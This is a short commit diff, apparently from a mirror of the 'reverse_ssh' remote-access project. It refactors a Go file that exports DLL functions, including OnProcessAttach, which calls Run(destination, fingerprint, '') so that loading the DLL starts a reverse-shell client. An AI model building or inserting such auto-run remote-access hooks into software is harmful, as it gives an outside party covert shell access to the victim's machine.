Projects STRLCPY reverse_ssh Commits f50616a5
🤬
  • ■ ■ ■ ■ ■ ■
    cmd/client/dllfuncs.go
    skipped 2 lines
    3 3  package main
    4 4   
    5 5  import "C"
    6  -import "github.com/NHAS/reverse_ssh/internal/client"
    7 6   
    8 7  //export VoidFunc
    9 8  func VoidFunc() {
    10  - client.Run(destination, fingerprint, "")
     9 + Run(destination, fingerprint, "")
    11 10  }
    12 11   
    13 12  //export OnProcessAttach
    14 13  func OnProcessAttach() {
    15  - client.Run(destination, fingerprint, "")
     14 + 
     15 + Run(destination, fingerprint, "")
    16 16  }
    17 17   
Please wait...
Page is in error, reload to recover